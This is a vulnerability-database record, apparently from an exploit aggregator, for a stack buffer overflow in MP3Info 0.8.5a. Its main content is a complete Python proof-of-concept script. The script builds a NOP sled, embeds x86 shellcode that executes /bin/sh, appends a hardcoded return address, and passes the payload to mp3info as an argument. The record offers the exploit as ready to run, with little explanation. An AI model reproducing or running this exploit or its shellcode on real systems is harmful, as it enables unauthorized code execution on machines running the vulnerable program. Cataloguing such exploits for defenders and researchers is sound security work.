DATABASE RESOURCES PRICING ABOUT US

{"href": "https://www.seebug.org/vuldb/ssvid-84558", "status": "cve,poc,details", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "MP3Info 0.8.5a - Buffer Overflow", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-84558", "cvelist": [], "description": "No description provided by source.", "viewCount": 3, "published": "2014-07-01T00:00:00", "sourceData": "\n # Waste of CPU clock N2\r\n# Exploit for: mp3info! Latest version\r\n# Author: jsacco - jsacco@exploitpack.com\r\n# Vendor: http://ibiblio.org/mp3info/\r\n# No-one-cares-about programs!\r\n\r\njunk = "\\x90\\x90\\x90\\x90"*8 \r\nshellcode = "\\x31\\xc0\\x50\\x68//sh\\x68/bin\\x89\\xe3\\x50\\x53\\x89\\xe1\\x99\\xb0\\x0b\\xcd\\x80"\r\nbuffer = "\\x90\\x90\\x90\\x90"*89\r\neip = "\\x10\\xf0\\xff\\xbf"\r\n\r\nprint "# MP3info is prone to a Stack-BoF"\r\nprint "# Wasting CPU clocks on unusable exploits"\r\nprint "# This is exploit is for educational purposes"\r\n\r\ntry:\r\n subprocess.call(["mp3info", junk+shellcode+buffer+eip])\r\nexcept OSError as e:\r\n if e.errno == os.errno.ENOENT:\r\n \tprint "MP3Info not found!"\r\n else:\r\n \tprint "Error executing exploit" \r\n raise\r\n\n ", "id": "SSV:84558", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T14:35:38", "reporter": "Root", "enchantments": {"score": {"value": 0.7, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.7}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647868386}}

{}